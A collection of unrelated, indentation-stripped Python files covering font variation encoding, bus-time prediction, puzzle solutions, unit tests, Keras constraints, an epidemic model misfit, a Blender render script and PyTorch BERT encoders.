axes = ",".join(sorted(["%s=%s" % (name, value) for (name, value) in self.axes.items()]))
return "<GlyphVariation %s %s>" % (axes, self.coordinates)
def __eq__(self, other):
return self.coordinates == other.coordinates and self.axes == other.axes
def getUsedPoints(self):
result = set()
for i, point in enumerate(self.coordinates):
if point is not None:
result.add(i)
return result
def hasImpact(self):
"""Returns True if this GlyphVariation has any visible impact.
If the result is False, the GlyphVariation can be omitted from the font
without making any visible difference.
"""
for c in self.coordinates:
if c is not None:
return True
return False
def toXML(self, writer, axisTags):
writer.begintag("tuple")
writer.newline()
for axis in axisTags:
value = self.axes.get(axis)
if value is not None:
minValue, value, maxValue = value
defaultMinValue = min(value, 0.0) # -0.3 --> -0.3; 0.7 --> 0.0
defaultMaxValue = max(value, 0.0) # -0.3 --> 0.0; 0.7 --> 0.7
if minValue == defaultMinValue and maxValue == defaultMaxValue:
writer.simpletag("coord", axis=axis, value=value)
else:
writer.simpletag("coord", axis=axis, value=value, min=minValue, max=maxValue)
writer.newline()
wrote_any_points = False
for i, point in enumerate(self.coordinates):
if point is not None:
writer.simpletag("delta", pt=i, x=point[0], y=point[1])
writer.newline()
wrote_any_points = True
if not wrote_any_points:
writer.comment("no deltas")
writer.newline()
writer.endtag("tuple")
writer.newline()
def fromXML(self, name, attrs, _content):
if name == "coord":
axis = attrs["axis"]
value = float(attrs["value"])
defaultMinValue = min(value, 0.0) # -0.3 --> -0.3; 0.7 --> 0.0
defaultMaxValue = max(value, 0.0) # -0.3 --> 0.0; 0.7 --> 0.7
minValue = float(attrs.get("min", defaultMinValue))
maxValue = float(attrs.get("max", defaultMaxValue))
self.axes[axis] = (minValue, value, maxValue)
elif name == "delta":
point = safeEval(attrs["pt"])
x = safeEval(attrs["x"])
y = safeEval(attrs["y"])
self.coordinates[point] = (x, y)
def compile(self, axisTags, sharedCoordIndices, sharedPoints):
tupleData = []
assert all(tag in axisTags for tag in self.axes.keys()), ("Unknown axis tag found.", self.axes.keys(), axisTags)
coord = self.compileCoord(axisTags)
if coord in sharedCoordIndices:
flags = sharedCoordIndices[coord]
else:
flags = EMBEDDED_TUPLE_COORD
tupleData.append(coord)
intermediateCoord = self.compileIntermediateCoord(axisTags)
if intermediateCoord is not None:
flags |= INTERMEDIATE_TUPLE
tupleData.append(intermediateCoord)
if sharedPoints is not None:
auxData = self.compileDeltas(sharedPoints)
else:
flags |= PRIVATE_POINT_NUMBERS
points = self.getUsedPoints()
numPointsInGlyph = len(self.coordinates)
auxData = self.compilePoints(points, numPointsInGlyph) + self.compileDeltas(points)
tupleData = struct.pack('>HH', len(auxData), flags) + bytesjoin(tupleData)
return (tupleData, auxData)
def compileCoord(self, axisTags):
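# Axis values are packed as F2Dot14 fixed-point numbers,
# e.g. 0.5 becomes floatToFixed(0.5, 14) == 0x2000.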
result = []
for axis in axisTags:
_minValue, value, _maxValue = self.axes.get(axis, (0.0, 0.0, 0.0))
result.append(struct.pack(">h", floatToFixed(value, 14)))
return bytesjoin(result)
def compileIntermediateCoord(self, axisTags):
needed = False
for axis in axisTags:
minValue, value, maxValue = self.axes.get(axis, (0.0, 0.0, 0.0))
defaultMinValue = min(value, 0.0) # -0.3 --> -0.3; 0.7 --> 0.0
defaultMaxValue = max(value, 0.0) # -0.3 --> 0.0; 0.7 --> 0.7
if (minValue != defaultMinValue) or (maxValue != defaultMaxValue):
needed = True
break
if not needed:
return None
minCoords = []
maxCoords = []
for axis in axisTags:
minValue, value, maxValue = self.axes.get(axis, (0.0, 0.0, 0.0))
minCoords.append(struct.pack(">h", floatToFixed(minValue, 14)))
maxCoords.append(struct.pack(">h", floatToFixed(maxValue, 14)))
return bytesjoin(minCoords + maxCoords)
@staticmethod
def decompileCoord_(axisTags, data, offset):
coord = {}
pos = offset
for axis in axisTags:
coord[axis] = fixedToFloat(struct.unpack(">h", data[pos:pos+2])[0], 14)
pos += 2
return coord, pos
@staticmethod
def decompileCoords_(axisTags, numCoords, data, offset):
result = []
pos = offset
for _ in range(numCoords):
coord, pos = GlyphVariation.decompileCoord_(axisTags, data, pos)
result.append(coord)
return result, pos
@staticmethod
def compilePoints(points, numPointsInGlyph):
# If the set consists of all points in the glyph, it gets encoded with
# a special encoding: a single zero byte.
if len(points) == numPointsInGlyph:
return b"\0"
# In the 'gvar' table, the packing of point numbers is a little surprising.
# It consists of multiple runs, each being a delta-encoded list of integers.
# For example, the point set {17, 18, 19, 20, 21, 22, 23} gets encoded as
# [6, 17, 1, 1, 1, 1, 1, 1]. The first value (6) is the run length minus 1.
# There are two types of runs, with values being either 8 or 16 bit unsigned
# integers.
points = list(points)
points.sort()
numPoints = len(points)
# The binary representation starts with the total number of points in the set,
# encoded into one or two bytes depending on the value.
if numPoints < 0x80:
result = [bytechr(numPoints)]
else:
result = [bytechr((numPoints >> 8) | 0x80) + bytechr(numPoints & 0xff)]
MAX_RUN_LENGTH = 127
pos = 0
lastValue = 0
while pos < numPoints:
run = io.BytesIO()
runLength = 0
useByteEncoding = None
while pos < numPoints and runLength <= MAX_RUN_LENGTH:
curValue = points[pos]
delta = curValue - lastValue
if useByteEncoding is None:
useByteEncoding = 0 <= delta <= 0xff
if useByteEncoding and (delta > 0xff or delta < 0):
# we need to start a new run (which will not use byte encoding)
break
# TODO This never switches back to a byte-encoding from a short-encoding.
# That's suboptimal.
if useByteEncoding:
run.write(bytechr(delta))
else:
run.write(bytechr(delta >> 8))
run.write(bytechr(delta & 0xff))
lastValue = curValue
pos += 1
runLength += 1
if useByteEncoding:
runHeader = bytechr(runLength - 1)
else:
runHeader = bytechr((runLength - 1) | POINTS_ARE_WORDS)
result.append(runHeader)
result.append(run.getvalue())
return bytesjoin(result)
@staticmethod
def decompilePoints_(numPointsInGlyph, data, offset):
"""(numPointsInGlyph, data, offset) --> ([point1, point2, ...], newOffset)"""
pos = offset
numPointsInData = byteord(data[pos])
pos += 1
if (numPointsInData & POINTS_ARE_WORDS) != 0:
numPointsInData = (numPointsInData & POINT_RUN_COUNT_MASK) << 8 | byteord(data[pos])
pos += 1
if numPointsInData == 0:
return (range(numPointsInGlyph), pos)
result = []
while len(result) < numPointsInData:
runHeader = byteord(data[pos])
pos += 1
numPointsInRun = (runHeader & POINT_RUN_COUNT_MASK) + 1
point = 0
if (runHeader & POINTS_ARE_WORDS) != 0:
points = array.array("H")
pointsSize = numPointsInRun * 2
else:
points = array.array("B")
pointsSize = numPointsInRun
points.fromstring(data[pos:pos+pointsSize])
if sys.byteorder != "big":
points.byteswap()
assert len(points) == numPointsInRun
pos += pointsSize
result.extend(points)
# Convert relative to absolute
absolute = []
current = 0
for delta in result:
current += delta
absolute.append(current)
result = absolute
del absolute
if max(result) >= numPointsInGlyph or min(result) < 0:
log.warning("point number out of range in 'gvar' table")
return (result, pos)
def compileDeltas(self, points):
deltaX = []
deltaY = []
for p in sorted(list(points)):
c = self.coordinates[p]
if c is not None:
deltaX.append(c[0])
deltaY.append(c[1])
return self.compileDeltaValues_(deltaX) + self.compileDeltaValues_(deltaY)
@staticmethod
def compileDeltaValues_(deltas):
"""[value1, value2, value3, ...] --> bytestring
Emits a sequence of runs. Each run starts with a
byte-sized header whose 6 least significant bits
(header & 0x3F) indicate how many values are encoded
in this run. The stored length is the actual length
minus one; run lengths are thus in the range [1..64].
If the header byte has its most significant bit (0x80)
set, all values in this run are zero, and no data
follows. Otherwise, the header byte is followed by
((header & 0x3F) + 1) signed values. If (header &
0x40) is clear, the delta values are stored as signed
bytes; if (header & 0x40) is set, the delta values are
signed 16-bit integers.
""" # Explaining the format because the 'gvar' spec is hard to understand.
stream = io.BytesIO()
pos = 0
while pos < len(deltas):
value = deltas[pos]
if value == 0:
pos = GlyphVariation.encodeDeltaRunAsZeroes_(deltas, pos, stream)
elif value >= -128 and value <= 127:
pos = GlyphVariation.encodeDeltaRunAsBytes_(deltas, pos, stream)
else:
pos = GlyphVariation.encodeDeltaRunAsWords_(deltas, pos, stream)
return stream.getvalue()
@staticmethod
def encodeDeltaRunAsZeroes_(deltas, offset, stream):
runLength = 0
pos = offset
numDeltas = len(deltas)
while pos < numDeltas and runLength < 64 and deltas[pos] == 0:
pos += 1
runLength += 1
assert runLength >= 1 and runLength <= 64
stream.write(bytechr(DELTAS_ARE_ZERO | (runLength - 1)))
return pos
@staticmethod
def encodeDeltaRunAsBytes_(deltas, offset, stream):
runLength = 0
pos = offset
numDeltas = len(deltas)
while pos < numDeltas and runLength < 64:
value = deltas[pos]
if value < -128 or value > 127:
break
# Within a byte-encoded run of deltas, a single zero
# is best stored literally as a 0x00 value. However,
# if there are two or more zeroes in a sequence, it is
# better to start a new run. For example, the sequence
# of deltas [15, 15, 0, 15, 15] becomes 6 bytes
# (04 0F 0F 00 0F 0F) when storing the zero value
# literally, but 7 bytes (01 0F 0F 80 01 0F 0F)
# when starting a new run.
if value == 0 and pos+1 < numDeltas and deltas[pos+1] == 0:
break
pos += 1
runLength += 1
assert runLength >= 1 and runLength <= 64
stream.write(bytechr(runLength - 1))
for i in range(offset, pos):
stream.write(struct.pack('b', deltas[i]))
return pos
@staticmethod
def encodeDeltaRunAsWords_(deltas, offset, stream):
runLength = 0
pos = offset
numDeltas = len(deltas)
while pos < numDeltas and runLength < 64:
value = deltas[pos]
# Within a word-encoded run of deltas, it is easiest
# to start a new run (with a different encoding)
# whenever we encounter a zero value. For example,
# the sequence [0x6666, 0, 0x7777] needs 7 bytes when
# storing the zero literally (42 66 66 00 00 77 77),
# and equally 7 bytes when starting a new run
# (40 66 66 80 40 77 77).
if value == 0:
break
# Within a word-encoded run of deltas, a single value
# in the range (-128..127) should be encoded literally
# because it is more compact. For example, the sequence
# [0x6666, 2, 0x7777] becomes 7 bytes when storing
# the value literally (42 66 66 00 02 77 77), but 8 bytes
# when starting a new run (40 66 66 00 02 40 77 77).
isByteEncodable = lambda value: value >= -128 and value <= 127
if isByteEncodable(value) and pos+1 < numDeltas and isByteEncodable(deltas[pos+1]):
break
pos += 1
runLength += 1
assert runLength >= 1 and runLength <= 64
stream.write(bytechr(DELTAS_ARE_WORDS | (runLength - 1)))
for i in range(offset, pos):
stream.write(struct.pack('>h', deltas[i]))
return pos
@staticmethod
def decompileDeltas_(numDeltas, data, offset):
"""(numDeltas, data, offset) --> ([delta, delta, ...], newOffset)"""
result = []
pos = offset
while len(result) < numDeltas:
runHeader = byteord(data[pos])
pos += 1
numDeltasInRun = (runHeader & DELTA_RUN_COUNT_MASK) + 1
if (runHeader & DELTAS_ARE_ZERO) != 0:
result.extend([0] * numDeltasInRun)
else:
if (runHeader & DELTAS_ARE_WORDS) != 0:
deltas = array.array("h")
deltasSize = numDeltasInRun * 2
else:
deltas = array.array("b")
deltasSize = numDeltasInRun
deltas.fromstring(data[pos:pos+deltasSize])
if sys.byteorder != "big":
deltas.byteswap()
assert len(deltas) == numDeltasInRun
pos += deltasSize
result.extend(deltas)
assert len(result) == numDeltas
return (result, pos)
@staticmethod
def getTupleSize_(flags, axisCount):
size = 4
if (flags & EMBEDDED_TUPLE_COORD) != 0:
size += axisCount * 2
if (flags & INTERMEDIATE_TUPLE) != 0:
size += axisCount * 4
return size
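# --- Worked example (illustrative comments only, not part of fontTools) ---
# Point packing, as described in compilePoints above: the set {17, ..., 23}
# is delta-encoded as one byte run whose header is the run length minus one:
#   [6, 17, 1, 1, 1, 1, 1, 1]
# (in the actual table data a point-count byte, here 7, precedes the runs).
# Delta packing, as described in compileDeltaValues_: the list [0, 0, 3, -4]
# becomes
#   0x81             -> two zero deltas (DELTAS_ARE_ZERO | (2 - 1))
#   0x01 0x03 0xFC   -> a byte run of two literal deltas, 3 and -4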
|
import pickle
import csv
import pandas as pd
import numpy as np
def prediction(line, startID, endID):
model_file_a = "{}_a_2017_06.clf".format(line)
model_file_b = "{}_b_2017_06.clf".format(line)
time_table_file_a = "{}_a_timeTable.csv".format(line)
time_table_file_b = "{}_b_timeTable.csv".format(line)
df_a = pd.read_csv(time_table_file_a, index_col=0)
df_b = pd.read_csv(time_table_file_b, index_col=0)
stops_a = []
inputFeatures_a = []
for column in df_a.columns:
stops_a.append(df_a[column].loc[0])
inputFeatures_a.append(df_a[column].iloc[1])
stops_b = []
inputFeatures_b = []
for column in df_b.columns:
stops_b.append(df_b[column].loc[0])
inputFeatures_b.append(df_b[column].iloc[1])
sequence_a = 0
sequence_b = 0
# Track matched stop positions separately for each direction (a / b), so the
# branch below always indexes the timetable it actually belongs to.
start_location_a = stop_location_a = 0
start_location_b = stop_location_b = 0
if startID in stops_a and endID in stops_a:
stop_location_a = stops_a.index(endID)
start_location_a = stops_a.index(startID)
sequence_a = stop_location_a - start_location_a
if startID in stops_b and endID in stops_b:
stop_location_b = stops_b.index(endID)
start_location_b = stops_b.index(startID)
sequence_b = stop_location_b - start_location_b
if sequence_a > sequence_b:
pairs = sequence_a
model_file = model_file_a
station_number = len(stops_a)
inputFeatures = inputFeatures_a
plannedTime_first = df_a[df_a.columns[0]].iloc[1]
plannedTime_end = df_a[df_a.columns[-1]].iloc[1]
plannedTime_start = df_a[df_a.columns[start_location_a]].iloc[1]
plannedTime_stop = df_a[df_a.columns[stop_location_a]].iloc[1]
elif sequence_b > sequence_a:
pairs = sequence_b
model_file = model_file_b
station_number = len(stops_b)
inputFeatures = inputFeatures_b
plannedTime_first = df_b[df_b.columns[0]].iloc[1]
plannedTime_end = df_b[df_b.columns[-1]].iloc[1]
plannedTime_start = df_b[df_b.columns[start_location_b]].iloc[1]
plannedTime_stop = df_b[df_b.columns[stop_location_b]].iloc[1]
else:
return 0
pkl_file = open(model_file, 'rb')
new_clf = pickle.load(pkl_file)
pkl_file.close()
predictions = new_clf.predict([inputFeatures])
pred_full_time = predictions[0][1] - predictions[0][0]
planned_full_time = plannedTime_end - plannedTime_first
planned_pairs_time = plannedTime_stop - plannedTime_start
#pair_time = (predictions[0][1]-predictions[0][0])/(station_number-1)
#print("end/first: {}/{}".format(predictions[0][1],predictions[0][0]))
#print("stop/start: {}/{}".format(plannedTime_stop, plannedTime_start))
#print(pair_time, pairs)
#return pair_time * pairs
# planned_full_time/planned_pairs_time = pred_full_time/pred_pairs_time
pred_pairs_time = pred_full_time * planned_pairs_time / planned_full_time
return pred_pairs_time
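# Worked example of the scaling above (hypothetical numbers): if the model
# predicts a 3600 s full-route time while the timetable plans 3000 s for the
# full route and 600 s for the requested stop pair, the returned estimate is
# 3600 * 600 / 3000 = 720 s for that pair.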
def main():
print(prediction('39A', 1913, 1660))
print(prediction('39A', 1864, 335))
print(prediction('39A', 6112, 1867))
if __name__ == '__main__':
main()
|
import mypackage.subpackage.module2
def test_eggs():
output = mypackage.subpackage.module2.eggs(2)
expected = "2 eggs, please!"
assert output == expected
|
import datetime
print(datetime.datetime.today().ctime())
|
'''
Elections are in progress!
Given an array of the numbers of votes given to each of the candidates so far, and an integer k equal to the number of voters who haven't cast their vote yet, find the number of candidates who still have a chance to win the election.
The winner of the election must secure strictly more votes than any other candidate. If two or more candidates receive the same (maximum) number of votes, assume there is no winner at all.
'''
def electionsWinners(votes, k):
currentWinner = max(votes)
res = 0
if k > 0:
# If we have votes left, the ones with the max number of votes can win and also the ones that
# their votes plus the votes left are greater than the currentWinner
for i in range(len(votes)):
if votes[i] + k > currentWinner:
res += 1
return res
else:
# If we don't have any votes left, we can only have one winner or no winner at all.
# If two or more candidates share the maximum number of votes, there's no winner.
aux = 0
for i in range(len(votes)):
if votes[i] == currentWinner:
aux += 1
if aux > 1:
return 0
return 1
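# Quick sanity checks (hypothetical vote counts): with [2, 3, 5, 2] and k = 3
# voters remaining, only the candidates on 3 and 5 votes can still finish
# strictly ahead; with no votes left and a tied maximum there is no winner.
assert electionsWinners([2, 3, 5, 2], 3) == 2
assert electionsWinners([1, 3, 3, 1], 0) == 0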
|
#!/usr/bin/env python
# Solution for http://adventofcode.com/2016/
import re
class Screen:
def __init__(self, width=50, height=6):
self.width = width
self.height = height
self.pixels = []
for i in range(self.height):
self.pixels.append(['.'] * self.width)
def show(self):
return '\n'.join(map(lambda x: ''.join(x), self.pixels))
def count_lit_pixels(self):
return sum(map(lambda x: x.count('#'), self.pixels))
def get_row(self, a):
return self.pixels[a]
def get_column(self, a):
return [self.pixels[x][a] for x in range(self.height)]
def set_row(self, a, row):
self.pixels[a] = row
def set_column(self, a, column):
for i in range(self.height):
self.pixels[i][a] = column[i]
def rect(self, a, b):
for i in range(b):
for j in range(a):
self.pixels[i][j] = '#'
def rotate_row(self, a, b):
row = self.get_row(a)
new_row = row[-b % self.width:] + row[:-b % self.width]
self.set_row(a, new_row)
def rotate_column(self, a, b):
column = self.get_column(a)
new_column = column[-b % self.height:] + column[:-b % self.height]
self.set_column(a, new_column)
def cmd(self, cmd):
m = re.match(r"rect (\d+)x(\d+)", cmd)
if m:
return self.rect(int(m.group(1)), int(m.group(2)))
m = re.match(r"rotate column x=(\d+) by (\d+)", cmd)
if m:
return self.rotate_column(int(m.group(1)), int(m.group(2)))
m = re.match(r"rotate row y=(\d+) by (\d+)", cmd)
if m:
return self.rotate_row(int(m.group(1)), int(m.group(2)))
raise Exception("Bad command or file name: %s" % cmd)
print "Work with sample data"
s = Screen(7, 3)
s.cmd('rect 3x2')
s.cmd('rotate column x=1 by 1')
s.cmd('rotate row y=0 by 4')
s.cmd('rotate column x=1 by 1')
print(s.show())
print("Number of pixels lit is", s.count_lit_pixels())
print("Work with real data")
s = Screen()
with open('advent_2016_8.txt') as fp:
line = fp.readline().strip()
while line and line != '':
s.cmd(line)
line = fp.readline().strip()
print(s.show())
print("Number of pixels lit is", s.count_lit_pixels())
|
"""Doby README testing"""
from doby.build import setup_py
def test_build_setup_empty():
"""Test build_setup_empty"""
function = {}
assert setup_py.build_setup(function) == ""
def test_build_setup_one_required_key_missing():
"""Test build_setup_one_required_key_missing"""
function = {}
function["description"] = "fruitTest configuration library"
function["name"] = "fruitTest"
function["setup"] = {}
function["requirements"] = {
"apple": {},
"orange": {"builtin": True, "operator": "==", "version": "1.0.0"},
"pear": {"builtin": False, "operator": "==", "version": "1.0.0"},
"lime": {"builtin": False, "operator": "=="},
}
setup = function["setup"]
setup["author"] = "Me"
setup["author_email"] = "me@example.com"
setup["url"] = "https://example.com"
assert setup_py.build_setup(function) == ""
def test_build_setup_no_extras():
"""Test build_setup_no_extras"""
function = {}
function["description"] = "fruitTest configuration library"
function["name"] = "fruitTest"
function["setup"] = {}
function["requirements"] = {
"apple": {},
"orange": {"builtin": True, "operator": "==", "version": "1.0.0"},
"pear": {"builtin": False, "operator": "==", "version": "1.0.0"},
"lime": {"builtin": False, "operator": "=="},
}
setup = function["setup"]
setup["version"] = "1.0.0"
setup["author"] = "Me"
setup["author_email"] = "me@example.com"
setup["url"] = "https://example.com"
assert setup_py.build_setup(function) == [
"import setuptools",
"",
'with open("README.md", "r") as fh:',
" LONG_DESCRIPTION = fh.read()",
"",
'setuptools.setup(name="fruitTest", version="1.0.0", author="Me", '
'author_email="me@example.com", url="https://example.com", '
'description="fruitTest configuration library", '
"long_description=LONG_DESCRIPTION, "
'long_description_content_type="text/markdown", classifiers=[], '
"install_requires=['reqrest', 'apple', 'pear', 'lime'], "
"include_package_data=True)",
]
def test_build_setup_all():
"""Test build_setup_all"""
function = {}
function["description"] = "fruitTest configuration library"
function["name"] = "fruitTest"
function["setup"] = {}
function["requirements"] = {
"apple": {},
"orange": {"builtin": True, "operator": "==", "version": "1.0.0"},
"pear": {"builtin": False, "operator": "==", "version": "1.0.0"},
"lime": {"builtin": False, "operator": "=="},
}
setup = function["setup"]
setup["version"] = "1.0.0"
setup["author"] = "Me"
setup["author_email"] = "me@example.com"
setup["url"] = "https://example.com"
setup["developmentStatus"] = "5 - Production/Stable"
setup["license"] = "OSI Approved :: Apache Software License"
setup["operatingSystem"] = "OS Independent"
setup["pythonVersion"] = "Python :: 3"
assert setup_py.build_setup(function) == [
"import setuptools",
"",
'with open("README.md", "r") as fh:',
" LONG_DESCRIPTION = fh.read()",
"",
'setuptools.setup(name="fruitTest", version="1.0.0", author="Me", '
'author_email="me@example.com", url="https://example.com", '
'description="fruitTest configuration library", '
"long_description=LONG_DESCRIPTION, "
'long_description_content_type="text/markdown", classifiers=["Development '
'Status :: 5 - Production/Stable","License Status :: OSI Approved :: Apache '
'Software License","Operating System :: OS Independent","Programming Language '
":: Python :: 3\",], install_requires=['reqrest', 'apple', 'pear', "
"'lime'], include_package_data=True)",
]
|
"""制約。"""
import tensorflow as tf
@tf.keras.utils.register_keras_serializable(package="pytoolkit")
class GreaterThanOrEqualTo(tf.keras.constraints.Constraint):
"""指定した値以上に制約する。"""
def __init__(self, value, **kwargs):
super().__init__(**kwargs)
self.value = value
def __call__(self, w):
return tf.math.maximum(w, self.value)
def get_config(self):
config = {"value": self.value}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
@tf.keras.utils.register_keras_serializable(package="pytoolkit")
class Clip(tf.keras.constraints.Constraint):
"""指定した値の範囲に制約する。"""
def __init__(self, min_value, max_value, **kwargs):
super().__init__(**kwargs)
self.min_value = min_value
self.max_value = max_value
def __call__(self, w):
return tf.clip_by_value(w, self.min_value, self.max_value)
def get_config(self):
config = {"min_value": self.min_value, "max_value": self.max_value}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
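# Minimal usage sketch (kept as a comment so nothing is built at import time):
# the constraints above plug into any Keras layer via its *_constraint kwargs.
#   layer = tf.keras.layers.Dense(
#       8,
#       kernel_constraint=GreaterThanOrEqualTo(0.0),
#       bias_constraint=Clip(-1.0, 1.0),
#   )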
|
import dolfin as dl
import numpy as np
import math
from datetime import datetime
STATE = 0
PARAMETER = 1
def validate_date(date_text):
try:
datetime.strptime(date_text, '%Y-%m-%d')
except ValueError:
raise ValueError("Incorrect data format, should be YYYY-MM-DD")
class seird_misfit:
def __init__(self, infected_cases, deceased_cases, date, simulation_time, truncated_gaussian = False, data_start_date="2020-03-06"):
self.noise_variance = None
self.truncated_gaussian = truncated_gaussian
validate_date(date)
d0 = datetime.strptime(data_start_date, "%Y-%m-%d")
d1 = datetime.strptime(date, "%Y-%m-%d")
day_index = abs((d1-d0)).days
if not infected_cases.size == deceased_cases.size:
raise IndexError("The total decease cases data and the total infected cases data does not match in size. Please re-check the data")
self.data = np.empty((round(simulation_time), 2))
self.data[:, 0] = infected_cases[day_index+1:(day_index + round(simulation_time)+1):1]
self.data[:, 1] = deceased_cases[day_index+1:(day_index + round(simulation_time)+1):1]
def set_noise_variance(self, percentages):
"""Setting the noise variance based on the percentages (numpy array of 2 values) at one standard deviation"""
self.noise_variance = np.empty_like(self.data)
for i in range(self.data.shape[0]):
for j in range(self.data.shape[1]):
self.noise_variance[i,j] = (self.data[i,j]*percentages[j])**2
def cost(self, x):
if self.noise_variance is None:
raise ValueError("Noise Variance must be specified")
if not x[STATE].shape == self.data.shape:
raise IndexError("The state output is of shape ", x[STATE].shape, ", while data is of shape ", self.data.shape, ".")
if self.truncated_gaussian:
misfit = 0.0
for i in range(self.data.shape[0]):
for j in range(self.data.shape[1]):
if x[STATE][i, j] < self.data[i,j]:
misfit = math.inf
break
else:
misfit += 0.5*(x[STATE][i, j] - self.data[i,j])**2/(self.noise_variance[i,j]) + math.log(2.)
return misfit
else:
return np.sum(np.divide(np.power(self.data - x[STATE], 2), 2*self.noise_variance))
|
import bpy, os
xy = os.environ['XY']
for scene in bpy.data.scenes:
scene.render.resolution_x = int(xy)
scene.render.resolution_y = int(xy)
scene.render.filepath = 'res/icons/hicolor/%sx%s/apps/%s.png'%(xy, xy, os.environ['APP_ID'])
scene.frame_end = 1
bpy.ops.render.render(write_still=True)
|
import torch
import torch.nn as nn
from torch.autograd import Variable
from models.rnn import CustomRNN
import transformers as ppb
class EncoderRNN(nn.Module):
""" Encodes navigation instructions, returning hidden state context (for
attention methods) and a decoder initial state. """
def __init__(self, opts, vocab_size, embedding_size, hidden_size, padding_idx,
dropout_ratio, bidirectional=False, num_layers=1):
super(EncoderRNN, self).__init__()
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.embedding_size = embedding_size
hidden_size = hidden_size // 2 if bidirectional else hidden_size
self.num_layers = num_layers
self.embedding = nn.Embedding(vocab_size, embedding_size, padding_idx)
self.drop = nn.Dropout(p=dropout_ratio)
self.bidirectional = bidirectional
self.rnn_kwargs = {
'cell_class': nn.LSTMCell,
'input_size': embedding_size,
'hidden_size': hidden_size,
'num_layers': num_layers,
'batch_first': True,
'dropout': 0,
}
self.rnn = CustomRNN(**self.rnn_kwargs)
def create_mask(self, batchsize, max_length, length):
"""Given the length create a mask given a padded tensor"""
tensor_mask = torch.zeros(batchsize, max_length)
for idx, row in enumerate(tensor_mask):
row[:length[idx]] = 1
return tensor_mask.to(self.device)
def flip(self, x, dim):
indices = [slice(None)] * x.dim()
indices[dim] = torch.arange(x.size(dim) - 1, -1, -1,
dtype=torch.long, device=x.device)
return x[tuple(indices)]
def forward(self, inputs, lengths):
"""
Expects input vocab indices as (batch, seq_len). Also requires a list of lengths for dynamic batching.
"""
embeds = self.embedding(inputs) # (batch, seq_len, embedding_size)
embeds = self.drop(embeds)
embeds_mask = self.create_mask(embeds.size(0), embeds.size(1), lengths)
if self.bidirectional:
output_1, (ht_1, ct_1) = self.rnn(embeds, mask=embeds_mask)
output_2, (ht_2, ct_2) = self.rnn(self.flip(embeds, 1), mask=self.flip(embeds_mask, 1))
output = torch.cat((output_1, self.flip(output_2, 0)), 2)
ht = torch.cat((ht_1, ht_2), 2)
ct = torch.cat((ct_1, ct_2), 2)
else:
output, (ht, ct) = self.rnn(embeds, mask=embeds_mask)
return output.transpose(0, 1), ht.squeeze(), ct.squeeze(), embeds_mask
class EncoderConfigBert(nn.Module):
''' Encodes navigation configuration, returning bert representation of each configuration '''
def __init__(self, opts, vocab_size, embedding_size, hidden_size, padding_idx,
dropout_ratio, bidirectional=False, num_layers=1):
super(EncoderConfigBert, self).__init__()
model_class, tokenizer_class, pretrained_weights = (ppb.BertModel, ppb.BertTokenizer, 'bert-base-uncased')
self.bert_tokenizer = tokenizer_class.from_pretrained(pretrained_weights)
self.bert_model = model_class.from_pretrained(pretrained_weights)
self.drop = nn.Dropout(p=dropout_ratio)
self.num_directions = 2 if bidirectional else 1
self.num_layers = num_layers
self.hidden_size = hidden_size
self.sf = SoftAttention(dimension=embedding_size)
def init_state(self, batch_size, max_config_num):
""" Initial state of model
a_0: batch x max_config_num
r_0: batch x 4
h_0: batch x hidden_size
c_0: batch x hidden_size
"""
a0 = Variable(torch.zeros(
batch_size,
#max_config_num,
10,
device=self.bert_model.device
), requires_grad=False)
a0[:,0] = 1
r0 = Variable(torch.zeros(
batch_size,
4,
device=self.bert_model.device
), requires_grad=False)
r0[:,0] = 1
h0 = Variable(torch.zeros(
batch_size,
self.hidden_size,
device=self.bert_model.device
), requires_grad=False)
c0 = Variable(torch.zeros(
batch_size,
self.hidden_size,
device=self.bert_model.device
), requires_grad=False)
return a0, r0, h0, c0
def bert_embedding(self, inputs, sep_list):
start = 0
features = []
token_features = []
padded_masks = []
token_padded_masks = []
tokenized_dict = self.bert_tokenizer.batch_encode_plus(inputs, add_special_tokens=True, return_attention_mask=True, return_tensors='pt', pad_to_max_length=True)
padded = tokenized_dict['input_ids'].to(self.bert_model.device)
attention_mask = tokenized_dict['attention_mask'].to(self.bert_model.device)
with torch.no_grad():
last_hidden_states = self.bert_model(padded, attention_mask=attention_mask)
# len(inputs) * embedding_size (274 * 768)
temp_feature = last_hidden_states[0]
#max_length = max(sep_list)
max_length = 10
for each_sep in sep_list:
end = start + min(each_sep, max_length)
# len(each_sep) * embedding_size (2 * 768)
feature = temp_feature[start:end,0,:]
feature = torch.zeros(max_length, temp_feature.shape[2], device=self.bert_model.device)
token_feature = torch.zeros(max_length, temp_feature.shape[1], temp_feature.shape[2], device=self.bert_model.device)
token_padded_mask = torch.zeros(max_length,temp_feature.shape[1], device=self.bert_model.device)
feature[0:(end-start), :] = temp_feature[start:end,0,:]
token_feature[0:(end-start),:,:] = temp_feature[start:end,:,:] # 10 x 13 x 768
# tmp_token_padded_mask = padded[start:end]
# token_padded_mask[0:(end-start),:]= torch.where(tmp_token_padded_mask>0, torch.full_like(tmp_token_padded_mask, 1), tmp_token_padded_mask)
token_padded_mask[0:(end-start),:] = attention_mask[start:end]
start += each_sep
# max_config_num * embedding_size (3 * 768)
#feature = torch.cat((feature, torch.zeros(max_length//each_sep, feature.shape[1], device=self.bert_model.device)), dim=0)
# 1 * max_config_num (1 * 3)
padded_mask = torch.zeros(max_length, device=self.bert_model.device)
padded_mask[:each_sep] = 1
features.append(feature)
token_features.append(token_feature)
padded_masks.append(padded_mask)
token_padded_masks.append(token_padded_mask)
# batch_size * max_config_num * embedding_size (100 * 3 * 768)
features = torch.stack(features, dim=0)
# batch_size * 1 * max_config_num (100 * 1 * 3)
padded_masks = torch.stack(padded_masks, dim= 0)
token_features = torch.stack(token_features, dim=0)
token_padded_masks = torch.stack(token_padded_masks, dim=0)
return features, padded_masks, token_features, token_padded_masks
def forward(self, inputs, sep_list):
"""
embeds: batch x max_len_config x embedding_size
a_t: batch x max_len_config
"""
embeds, padded_mask, token_features, token_padded_masks = self.bert_embedding(inputs, sep_list) # 10 x 768
weighted_embeds, attn = self.sf(embeds, padded_mask, token_features, token_padded_masks) # batch x 10 x 768; batch x 10 x max_token_len
return weighted_embeds, padded_mask
class SoftAttention(nn.Module):
"""Soft-Attention without learnable parameters
"""
def __init__(self, dimension):
super(SoftAttention, self).__init__()
self.softmax = nn.Softmax(dim=2)
self.conf_linear = nn.Linear(768, 768)
def forward(self, cls_input, cls_mask, token_input, token_mask):
"""Propagate h through the network.
cls_input: batch x 10 x 768
cls_mask: batch x 10
